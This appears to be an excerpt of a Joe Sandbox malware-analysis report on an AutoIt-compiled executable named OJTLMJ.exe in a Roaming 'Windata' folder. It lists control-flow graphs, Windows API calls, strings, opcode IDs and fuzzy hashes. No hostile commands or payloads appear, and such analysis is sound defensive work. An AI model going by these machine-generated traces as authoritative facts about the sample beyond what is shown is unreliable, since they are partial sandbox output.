                                                                                                                control_flow_graph 546 d41f04-d41f9c call d42d1a * 2 call d4c935 * 2 call d47e53 call d4d3d2 * 3 563 db2569-db2575 call d62626 546->563 564 d41fa2-d41fa6 546->564 566 db257d-db2583 call d7e4ea 563->566 564->566 567 d41fac-d41faf 564->567 570 db258f-db259b call d4a4f6 566->570 569 d41fb5-d41fb8 567->569 567->570 569->570 572 d41fbe-d41fe3 GetForegroundWindow call d4200a call d4197e 569->572 578 db2899-db289d 570->578 579 db25a1-db25b1 call d4a4f6 570->579 592 d41fe4-d42007 call d45cd3 * 3 572->592 582 db28ab-db28ae 578->582 583 db289f-db28a6 call d4c935 578->583 579->578 591 db25b7-db25c5 579->591 584 db28b0 582->584 585 db28b7-db28c4 582->585 583->582 584->585 589 db28d6-db28da 585->589 590 db28c6-db28d4 call d4b8a7 CharUpperBuffW 585->590 595 db28dc-db28df 589->595 596 db28f1-db28fa 589->596 590->589 594 db25c9-db25e1 call d7d68d 591->594 594->578 609 db25e7-db25f7 call d5f885 594->609 595->596 600 db28e1-db28ef call d4b8a7 CharUpperBuffW 595->600 601 db290b EnumWindows 596->601 602 db28fc-db2909 GetDesktopWindow EnumChildWindows 596->602 600->596 607 db2911-db2930 call d7e44e call d42d1a 601->607 602->607 621 db2932-db293b call d4200a 607->621 622 db2940 607->622 619 db287b-db288b call d5f885 609->619 620 db25fd-db260d call d5f885 609->620 628 db288d-db2891 619->628 629 db2873-db2876 619->629 630 db2613-db2623 call d5f885 620->630 631 db2861-db2871 call d5f885 620->631 621->622 628->592 633 db2897 628->633 639 db2629-db2639 call d5f885 630->639 640 db281d-db2836 call d888a2 IsWindow 630->640 631->629 638 db2842-db2848 GetForegroundWindow 631->638 636 db2852-db2858 633->636 636->631 643 db2849-db2850 call d4200a 638->643 648 db263b-db2640 639->648 649 db2659-db2669 call d5f885 639->649 640->592 650 db283c-db2840 640->650 643->636 651 db280d-db280f 648->651 652 db2646-db2657 call d45cf6 648->652 658 db266b-db2675 649->658 659 db267a-db268a call d5f885 649->659 650->643 655 db2817-db2818 651->655 660 db269b-db26a7 call d45be9 652->660 655->592 661 db27e6-db27f0 call d4c935 658->661 668 db268c-db2698 call d45cf6 659->668 669 db26b5-db26c5 call d5f885 659->669 671 db26ad-db26b0 660->671 672 db2811-db2813 660->672 670 db2804-db2808 661->670 668->660 677 db26e3-db26f3 call d5f885 669->677 678 db26c7-db26de call d62241 669->678 670->594 671->670 672->655 683 db2711-db2721 call d5f885 677->683 684 db26f5-db270c call d62241 677->684 678->670 689 db273f-db274f call d5f885 683->689 690 db2723-db273a call d62241 683->690 684->670 695 db276d-db277d call d5f885 689->695 696 db2751-db2768 call d62241 689->696 690->670 701 db277f-db2793 call d62241 695->701 702 db2795-db27a5 call d5f885 695->702 696->670 701->670 707 db27c3-db27d3 call d5f885 702->707 708 db27a7-db27b7 call d5f885 702->708 714 db27f2-db2802 call d7d614 707->714 715 db27d5-db27da 707->715 708->629 713 db27bd-db27c1 708->713 713->670 714->629 714->670 717 db27dc-db27e2 715->717 718 db2815 715->718 717->661 718->655
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00D47E53: _memmove.LIBCMT ref: 00D47EB9
                                                                                                                • GetForegroundWindow.USER32 ref: 00D41FBE
                                                                                                                • IsWindow.USER32(?), ref: 00DB282E
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window$Foreground_memmove
                                                                                                                • String ID: ACTIVE$ALL$CLASS$HANDLE$INSTANCE$LAST$REGEXPCLASS$REGEXPTITLE$TITLE
                                                                                                                • API String ID: 3828923867-1919597938
                                                                                                                • Opcode ID: a75b20df44727c1180aa9c0d1297355b8926b12357b04f6ea14104942d18f934
                                                                                                                • Instruction ID: f9437fa89bf8e367f4d682c3cd71cd4bab098e68f573f622180ae71bcbe5991c
                                                                                                                • Opcode Fuzzy Hash: a75b20df44727c1180aa9c0d1297355b8926b12357b04f6ea14104942d18f934
                                                                                                                • Instruction Fuzzy Hash: 53D1D975504702DBCB04EF10C891AFABBA1FF58344F144A2DF896576A1DB30E999CBB2

                                                                                                                Control-flow Graph

                                                                                                                APIs
                                                                                                                • GetSysColorBrush.USER32(0000000F), ref: 00D42F8B
                                                                                                                • RegisterClassExW.USER32(00000030), ref: 00D42FB5
                                                                                                                • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00D42FC6
                                                                                                                • InitCommonControlsEx.COMCTL32(?), ref: 00D42FE3
                                                                                                                • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00D42FF3
                                                                                                                • LoadIconW.USER32(000000A9), ref: 00D43009
                                                                                                                • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00D43018
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                                                                • String ID: +$0$AutoIt v3 GUI$TaskbarCreated$3Ro
                                                                                                                • API String ID: 2914291525-1473020178
                                                                                                                • Opcode ID: d36afc68b0ab6d2ecd8b49f1630c27dd2f94be672fbf3eeadef7fb164956e675
                                                                                                                • Instruction ID: a67735a16f6dc5db180e0d604f71d03dc8df42a25d49bdd5de45e0716d236895
                                                                                                                • Opcode Fuzzy Hash: d36afc68b0ab6d2ecd8b49f1630c27dd2f94be672fbf3eeadef7fb164956e675
                                                                                                                • Instruction Fuzzy Hash: 5621B7B590031AAFDB009F95EC89BCDBBB5FB08700F10815AF515EA3A0D7B14688CFA5

                                                                                                                Control-flow Graph

                                                                                                                APIs
                                                                                                                • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\AppData\Roaming\Windata\OJTLMJ.exe,00000104,?,00000000,00000001,00000000), ref: 00D4428C
                                                                                                                  • Part of subcall function 00D4CAEE: _memmove.LIBCMT ref: 00D4CB2F
                                                                                                                  • Part of subcall function 00D61BC7: __wcsicmp_l.LIBCMT ref: 00D61C50
                                                                                                                • _wcscpy.LIBCMT ref: 00D443C0
                                                                                                                • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\AppData\Roaming\Windata\OJTLMJ.exe,00000104,?,?,?,?,00000000,CMDLINE,?,?,00000100,00000000,CMDLINE,?,?), ref: 00DB214E
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FileModuleName$__wcsicmp_l_memmove_wcscpy
                                                                                                                • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$C:\Users\user\AppData\Roaming\Windata\OJTLMJ.exe$CMDLINE$CMDLINERAW
                                                                                                                • API String ID: 861526374-3234958271
                                                                                                                • Opcode ID: a3e7fae3b2ee4197e9cfa24d856deeeb5c29e728d47d45f920b9cc8d047b020f
                                                                                                                • Instruction ID: 3ee6ce9fdffe0eb86c3ce9c163a28f87083e0a1006e328ce77450c329ac147e0
                                                                                                                • Opcode Fuzzy Hash: a3e7fae3b2ee4197e9cfa24d856deeeb5c29e728d47d45f920b9cc8d047b020f
                                                                                                                • Instruction Fuzzy Hash: 15818072800219ABCB05EBE4CD96EEF77B8EF15350F140016F545B7192EF606A48CBB2

                                                                                                                Control-flow Graph

                                                                                                                APIs
                                                                                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00D5EA39
                                                                                                                • __wsplitpath.LIBCMT ref: 00D5EA56
                                                                                                                  • Part of subcall function 00D6297D: __wsplitpath_helper.LIBCMT ref: 00D629BD
                                                                                                                • _wcsncat.LIBCMT ref: 00D5EA69
                                                                                                                • __makepath.LIBCMT ref: 00D5EA85
                                                                                                                  • Part of subcall function 00D62BFF: __wmakepath_s.LIBCMT ref: 00D62C13
                                                                                                                  • Part of subcall function 00D6010A: std::exception::exception.LIBCMT ref: 00D6013E
                                                                                                                  • Part of subcall function 00D6010A: __CxxThrowException@8.LIBCMT ref: 00D60153
                                                                                                                • _wcscpy.LIBCMT ref: 00D5EABE
                                                                                                                  • Part of subcall function 00D5EB05: RegOpenKeyExW.KERNEL32(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,00000000,?,00D5EADA,?,?), ref: 00D5EB27
                                                                                                                • _wcscat.LIBCMT ref: 00DB32FC
                                                                                                                • _wcscat.LIBCMT ref: 00DB3334
                                                                                                                • _wcsncpy.LIBCMT ref: 00DB3370
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _wcscat$Exception@8FileModuleNameOpenThrow__makepath__wmakepath_s__wsplitpath__wsplitpath_helper_wcscpy_wcsncat_wcsncpystd::exception::exception
                                                                                                                • String ID: Include$\$"
                                                                                                                • API String ID: 1213536620-2474423117
                                                                                                                • Opcode ID: 7824e7c55d05d51c4a2c9459200a2ac2acdbcc020d1c1f672bcf0aaeebebfcde
                                                                                                                • Instruction ID: bb65bbf5bdabbca99ef5ab959040749abaea03f3c910da753813cec8d287f6d9
                                                                                                                • Opcode Fuzzy Hash: 7824e7c55d05d51c4a2c9459200a2ac2acdbcc020d1c1f672bcf0aaeebebfcde
                                                                                                                • Instruction Fuzzy Hash: 7D5180B14043419FC704EF9AEC89C9B77E8FB59300B40452EF645A3261EB79968CCB76

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 923 d429c2-d429e2 925 d429e4-d429e7 923->925 926 d42a42-d42a44 923->926 928 d42a48 925->928 929 d429e9-d429f0 925->929 926->925 927 d42a46 926->927 930 d42a2b-d42a33 DefWindowProcW 927->930 931 d42a4e-d42a51 928->931 932 db2307-db2335 call d4322e call d5ec33 928->932 933 d429f6-d429fb 929->933 934 d42aac-d42ab4 PostQuitMessage 929->934 936 d42a39-d42a3f 930->936 937 d42a76-d42a9d SetTimer RegisterWindowMessageW 931->937 938 d42a53-d42a54 931->938 966 db233a-db2341 932->966 940 db238f-db23a3 call d857fb 933->940 941 d42a01-d42a03 933->941 935 d42a72-d42a74 934->935 935->936 937->935 945 d42a9f-d42aaa CreatePopupMenu 937->945 942 db22aa-db22ad 938->942 943 d42a5a-d42a6d KillTimer call d42b94 call d42ac7 938->943 940->935 959 db23a9 940->959 946 d42ab6-d42ac5 call d41e58 941->946 947 d42a09-d42a0e 941->947 951 db22af-db22b1 942->951 952 db22e3-db2302 MoveWindow 942->952 943->935 945->935 946->935 955 d42a14-d42a19 947->955 956 db2374-db237b 947->956 961 db22b3-db22b6 951->961 962 db22d2-db22de SetFocus 951->962 952->935 957 db235f-db236f call d85fdb 955->957 958 d42a1f-d42a25 955->958 956->930 964 db2381-db238a call d7b31f 956->964 957->935 958->930 958->966 959->930 961->958 967 db22bc-db22cd call d4322e 961->967 962->935 964->930 966->930 971 db2347-db235a call d42b94 call d43598 966->971 967->935 971->930
                                                                                                                APIs
                                                                                                                • DefWindowProcW.USER32(?,?,?,?), ref: 00D42A33
                                                                                                                • KillTimer.USER32(?,00000001), ref: 00D42A5D
                                                                                                                • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00D42A80
                                                                                                                • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00D42A8B
                                                                                                                • CreatePopupMenu.USER32 ref: 00D42A9F
                                                                                                                • PostQuitMessage.USER32(00000000), ref: 00D42AAE
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                                                                • String ID: TaskbarCreated
                                                                                                                • API String ID: 129472671-2362178303
                                                                                                                • Opcode ID: c7b89a9b6e0a302c23d680a479d3f31965efdca00e63b8ec90c6f1eb95d640dd
                                                                                                                • Instruction ID: b311f43004f75a8ca806b57f5ddb65505eabdee3cf05baeb0e7b8fd5c444bc6d
                                                                                                                • Opcode Fuzzy Hash: c7b89a9b6e0a302c23d680a479d3f31965efdca00e63b8ec90c6f1eb95d640dd
                                                                                                                • Instruction Fuzzy Hash: 6F41593114024A9FDB34AF68DC0BBB936A6EB54304F884129FD82FA2A1DA75DD84C775

                                                                                                                Control-flow Graph

                                                                                                                APIs
                                                                                                                • GetSysColorBrush.USER32(0000000F), ref: 00D430B0
                                                                                                                • LoadCursorW.USER32(00000000,00007F00), ref: 00D430BF
                                                                                                                • LoadIconW.USER32(00000063), ref: 00D430D5
                                                                                                                • LoadIconW.USER32(000000A4), ref: 00D430E7
                                                                                                                • LoadIconW.USER32(000000A2), ref: 00D430F9
                                                                                                                  • Part of subcall function 00D4318A: LoadImageW.USER32(00D40000,00000063,00000001,00000010,00000010,00000000), ref: 00D431AE
                                                                                                                • RegisterClassExW.USER32(?), ref: 00D43167
                                                                                                                  • Part of subcall function 00D42F58: GetSysColorBrush.USER32(0000000F), ref: 00D42F8B
                                                                                                                  • Part of subcall function 00D42F58: RegisterClassExW.USER32(00000030), ref: 00D42FB5
                                                                                                                  • Part of subcall function 00D42F58: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00D42FC6
                                                                                                                  • Part of subcall function 00D42F58: InitCommonControlsEx.COMCTL32(?), ref: 00D42FE3
                                                                                                                  • Part of subcall function 00D42F58: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00D42FF3
                                                                                                                  • Part of subcall function 00D42F58: LoadIconW.USER32(000000A9), ref: 00D43009
                                                                                                                  • Part of subcall function 00D42F58: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00D43018
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                                                                • String ID: #$0$AutoIt v3
                                                                                                                • API String ID: 423443420-4155596026
                                                                                                                • Opcode ID: 06e228a0ca7d3168528f19a9ab7f44fd13d49dd77c7a865a8a42ccae38c279db
                                                                                                                • Instruction ID: 3d2ea7cbb7c45362fc4d566c974d517fb40215225843a0c0bcf8add72c77de37
                                                                                                                • Opcode Fuzzy Hash: 06e228a0ca7d3168528f19a9ab7f44fd13d49dd77c7a865a8a42ccae38c279db
                                                                                                                • Instruction Fuzzy Hash: A9214770D01305AFCB04DFAAEC49A99BFF5FB48310F00816AE615B73A0D77659888FA1

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 987 d445a7-d445e0 988 d445e6-d445fe mciSendStringW 987->988 989 db5935-db5936 DestroyWindow 987->989 990 d44604-d4460a 988->990 991 d447a6-d447b3 988->991 992 db5941-db5944 989->992 993 d447e7-d447f4 990->993 994 d44610-d44625 call d43029 990->994 995 d447b5-d447d0 UnregisterHotKey 991->995 996 d447d8-d447df 991->996 999 db595a-db5976 FindClose call d6017e 992->999 1000 db5946-db5958 call d450ec 992->1000 993->992 998 d447fa-d44801 993->998 1008 db598d-db5999 994->1008 1009 d4462b-d44633 994->1009 995->996 1002 d447d2-d447d3 call d5f902 995->1002 996->990 997 d447e5 996->997 997->991 998->994 1005 d44807 998->1005 1016 db5977-db5987 call d6017e 999->1016 1000->1016 1002->996 1005->993 1014 db599b-db599d FreeLibrary 1008->1014 1015 db59a3-db59aa 1008->1015 1012 db59b1-db59be 1009->1012 1013 d44639-d4465e call d52570 1009->1013 1020 db59c0-db59dd VirtualFree 1012->1020 1021 db59e5-db59ec 1012->1021 1026 d44695-d446a0 CoUninitialize 1013->1026 1027 d44660 1013->1027 1014->1015 1015->1008 1019 db59ac 1015->1019 1016->1008 1019->1012 1020->1021 1024 db59df-db59e0 call d8d323 1020->1024 1021->1012 1025 db59ee 1021->1025 1024->1021 1031 db59f3-db59f6 1025->1031 1030 d446a6-d4475a call d432c9 call d42e6d call d45cd3 call d44208 call d42e54 call d42de4 call d45cd3 call d52570 call d42e54 call d42c64 * 2 call d42e54 call d5f8a4 call d42c64 call d42e8f call d42f47 call d45cd3 call d45202 1026->1030 1026->1031 1029 d44663-d44693 call d42f0e call d42d7f 1027->1029 1029->1026 1073 d4475f-d447a5 call d43d9b * 2 call d45cd3 * 3 call d43282 1030->1073 1031->1030 1032 db59fc-db5a02 1031->1032 1032->1030
                                                                                                                APIs
                                                                                                                • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00D445F0
                                                                                                                • CoUninitialize.COMBASE ref: 00D44695
                                                                                                                • UnregisterHotKey.USER32(?), ref: 00D447BD
                                                                                                                • DestroyWindow.USER32(?), ref: 00DB5936
                                                                                                                • FreeLibrary.KERNEL32(?), ref: 00DB599D
                                                                                                                • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00DB59CA
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                                                                                • String ID: close all
                                                                                                                • API String ID: 469580280-3243417748
                                                                                                                • Opcode ID: 233f5955c072c6dfd4fe0bf3793e22afa61933096d4039dccfb7eb3c06cdf28d
                                                                                                                • Instruction ID: 1fa438f1678b151fb784dafc0c310b31f8485c0cc318b7f701862600e95940e1
                                                                                                                • Opcode Fuzzy Hash: 233f5955c072c6dfd4fe0bf3793e22afa61933096d4039dccfb7eb3c06cdf28d
                                                                                                                • Instruction Fuzzy Hash: 0B912934600602CFCB19EF24D895BA9F3A4FF15701F5542A9F44AA7266DB30AE5ACF70

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 1141 d5eb05-d5eb2f call d4c4cd RegOpenKeyExW 1144 d5eb35-d5eb39 1141->1144 1145 db4b17-db4b2e RegQueryValueExW 1141->1145 1146 db4b91-db4b9a RegCloseKey 1145->1146 1147 db4b30-db4b6d call d6010a call d44bce RegQueryValueExW 1145->1147 1152 db4b88-db4b90 call d44fd2 1147->1152 1153 db4b6f-db4b86 call d47e53 1147->1153 1152->1146 1153->1152
                                                                                                                APIs
                                                                                                                • RegOpenKeyExW.KERNEL32(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,00000000,?,00D5EADA,?,?), ref: 00D5EB27
                                                                                                                • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?,?,00D5EADA,?,?), ref: 00DB4B26
                                                                                                                • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000,?,?,00D5EADA,?,?), ref: 00DB4B65
                                                                                                                • RegCloseKey.ADVAPI32(?,?,00D5EADA,?,?), ref: 00DB4B94
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: QueryValue$CloseOpen
                                                                                                                • String ID: Include$Software\AutoIt v3\AutoIt
                                                                                                                • API String ID: 1586453840-614718249
                                                                                                                • Opcode ID: 842911309747df568c64049fa59090dbe1396563f507465d2db41da89207feea
                                                                                                                • Instruction ID: 981a1bb247cef1fcfc52d1309e3a1d1c01d4acc830a301e8fc7bfc57b49336cc
                                                                                                                • Opcode Fuzzy Hash: 842911309747df568c64049fa59090dbe1396563f507465d2db41da89207feea
                                                                                                                • Instruction Fuzzy Hash: 66113A71611209BFEB04EBA8CD86EFE77BDEF04354F100069B506E6191EA70AE45EB70

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 1168 d42e9d-d42f0d CreateWindowExW * 2 ShowWindow * 2
                                                                                                                APIs
                                                                                                                • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00D42ECB
                                                                                                                • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00D42EEC
                                                                                                                • ShowWindow.USER32(00000000), ref: 00D42F00
                                                                                                                • ShowWindow.USER32(00000000), ref: 00D42F09
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window$CreateShow
                                                                                                                • String ID: AutoIt v3$edit
                                                                                                                • API String ID: 1584632944-3779509399
                                                                                                                • Opcode ID: d6c420f3bade3f07860b681d3d55c08fdc1f06a66b54b76d69b7fb712c52818b
                                                                                                                • Instruction ID: f8e60c906ada553c0a0305ddd3ebb1e2d2853750eb550a5c4f3a05806dba2e78
                                                                                                                • Opcode Fuzzy Hash: d6c420f3bade3f07860b681d3d55c08fdc1f06a66b54b76d69b7fb712c52818b
                                                                                                                • Instruction Fuzzy Hash: A8F030705442D07ED73057536C4CE673E7ED7C6F10F01805FB904AA2A0C16218C9CA70

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
